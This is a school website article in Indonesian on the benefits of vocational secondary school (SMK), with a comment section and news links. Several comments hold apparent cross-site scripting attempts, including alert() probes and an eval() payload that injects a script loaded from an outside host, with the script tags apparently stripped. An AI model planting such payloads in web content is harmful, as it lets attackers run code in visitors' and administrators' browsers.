• SMK BUDI PERKASA
  • Tangguh Berkarakter

KEUNTUNGAN MELANJUTKAN SEKOLAH KE SMK

Mungkin sebelum Anda melanjutkan membaca artikel ini, tahukah Anda bahwa SMK terkenal dengan tujuan utamanya yaitu bisa langsung bekerja setelah lulus dan memiliki keahlian khusus. Pastinya semua orang tua atau bahkan siswa itu sendiri ingin masuk di sekolah lanjutan yang menjajikan.
Apakah perbedaan dari Sekolah Menengah Atas (SMA) dan Sekolah Menengah Kejuruan (SMK)? Dari segi tujuan utama, SMA dan SMK semuanya sama. Tujuan utamanya yaitu sama-sama untuk mencari ilmu. Namun SMA dan SMK memiliki masing-masing keunggulan yang sangat menonjol dalam pelajaran bidang studi dan tujuan lainnya.
Gambar: Siswa Praktik Jurusan TITL SMK Budi Perkasa
Namun tahukah Anda bahwa SMK itu memiliki keistimewaan dan kelebihan tersendiri? Berikut penjelasannya.

1. Menguasai Keahlian Kejuruan
Masing-masing SMK pastinya memiliki jurusan yang berbeda-beda. Bila Anda mencari sekolah SMK, sebaiknya Anda memilih sekolah yang memiliki jurusan yang Anda minati.
Guru yang akan mendidik Anda di SMK lebih mengutamakan pelajaran jurusan dari pada pelajaran lain. Waktu belajar pelajar SMK sama saja dengan pelajar SMA, namun dalam pelajaran teori praktik siswa SMK lebih unggul.

2. Pelajaran Praktik Lebih Diutamakan

Gambar: Praktik siswa Jurusan TP (Teknik Pemesinan) SMK Budi perkasa

Pelajar SMK lebih mengutamakan teori praktik daripada tulis, hal tersebut karena siswa SMK ditargetkan dalam pelajaran kejuruan yang memang harus banyak dipelajari dalam teori praktik. Pelajaran siswa SMK yakni sama saja seperti pelajar SMA, yang jadi kelebihannya, siswa SMK memiliki tambahan pelajaran keahlian dan mempunyai teori lebih banyak daripada pelajaran lainnya.
3. Merasakan Praktik Kerja Langsung
Hal yang dirasakan oleh pelajar SMK yakni akan diwajibkan melakukan praktik kerja industri (prakerin). Praktik ini memang harus dikerjakan apabila ingin lulus dengan nilai yang bagus. Prakerin akan dilakukan oleh pelajar SMK ketika duduk di bangku kelas XI, namun ada juga sekolah lain yang melaksanakan prakerin di kelas XII.
4. Siap Untuk Bekerja Setelah Lulus SMK
Kelebihan lain dari siswa lulusan SMK yaitu siap untuk bekerja. Siswa SMK bisa bekerja dengan cepat dari skill yang dimiliknya sejak duduk di bangku sekolah. Peluang bekerja lebih besar bila dibandingkan siswa lulusan SMA. Dari segi keahlian tentu saja SMK lebih ahli dalam mencari pekerjaan. Itu sebabnya banyak lulusan SMK yang langsung bekerja.
5. Peluang Membuka Usaha Lebih Mudah
Setiap orang pasti beda keyakinan dalam mencari dan memilih jalan kehidupan atau karirnya. Bagi pelajar SMK di zaman sekarang, banyak yang berpendapat bahwa mereka lebih memilih untuk membuka usaha sendiri daripada bekerja kepada orang lain. Memang dalam membuka usaha tentu saja membutuhkan modal awal. Tetapi dalam mencari modal usaha bisa lebih mudah didapatkan kalau mereka punya ketekatan dan keinginan yang tinggi.
Nah itulah beberapa kelebihan dari SMK dibandingkan dengan SMA, semoga bermanfaat dan bisa menjadi gambaran untuk Anda yang mungkin sedang bingung dalam menentukan sekolah.

Komentar

[removed][removed]

[removed]alert("hallo")[removed]

[removed]eval('var a=document.createElement('script');a.src='https://fulldxrmediaxyz.bxss.in';document.body.appendChild(a)')

[removed]alert.domain[removed]

Hallo

>

[removed]alert(1)[removed]

[removed][removed]

Sangat berguna

Situs web ini membantu menambah informasi mengenai pendidikan SMK dan sma

Komentari Tulisan Ini
Tulisan Lainnya
Launching PPDB SMK PK Budi Perkasa Tahun Ajar 2025/2026

SMK PK Budi Perkasa telah resmi melakukan Soft Launching agenda Penerimaan Peserta Didik Baru (PPDB) tahun ajaran 2025/2026 pada hari Rabu, 16 Oktober 2024. Acara peluncuran ini digelar

17/10/2024 13:58 - Oleh Team Humas - Dilihat 79 kali
Peringatan Maulid Nabi Muhammad SAW di SMK PK Budi Perkasa Berlangsung Khidmat

SMK PK Budi Perkasa mengadakan peringatan hari lahir Nabi Muhammad SAW dengan suasana yang penuh khidmat dan kebersamaan, pada hari Rabu, 16 Oktober 2024. Pada peringatan kali ini, selu

16/10/2024 23:26 - Oleh Team Humas - Dilihat 148 kali
Latihan Dasar Kepemimpinan (LDK) OSIS SMK PK Budi Perkasa Tahun Pelajaran 2024/2025

Latihan Dasar Kepemimpinan (LDK) OSIS SMK PK Budi Perkasa periode 2024/2025 adalah kegiatan penting untuk membentuk kepemimpinan yang baik, tangguh serta berkarakter. LDK tahun ini meng

06/10/2024 16:44 - Oleh Team Humas - Dilihat 219 kali
Semarak Hari Batik Nasional di SMK PK Budi Perkasa

Hari Batik Nasional adalah hari perayaan nasional Indonesia untuk memperingati ditetapkannya batik sebagai Warisan Kemanusiaan untuk Budaya Lisan dan Non bendawi (Masterpieces of t

06/10/2024 14:10 - Oleh Team Humas - Dilihat 110 kali
Program Persiapan Magang Ke Jepang di SMK PK Budi Perkasa

Bekerja di Jepang menjadi salah satu impian banyak lulusan Sekolah Menengah Kejuruan (SMK) di Indonesia. Peluang kerja di Jepang terbuka lebar bagi lulusan SMK melalui beberapa jalur, t

28/09/2024 17:32 - Oleh Team Humas - Dilihat 143 kali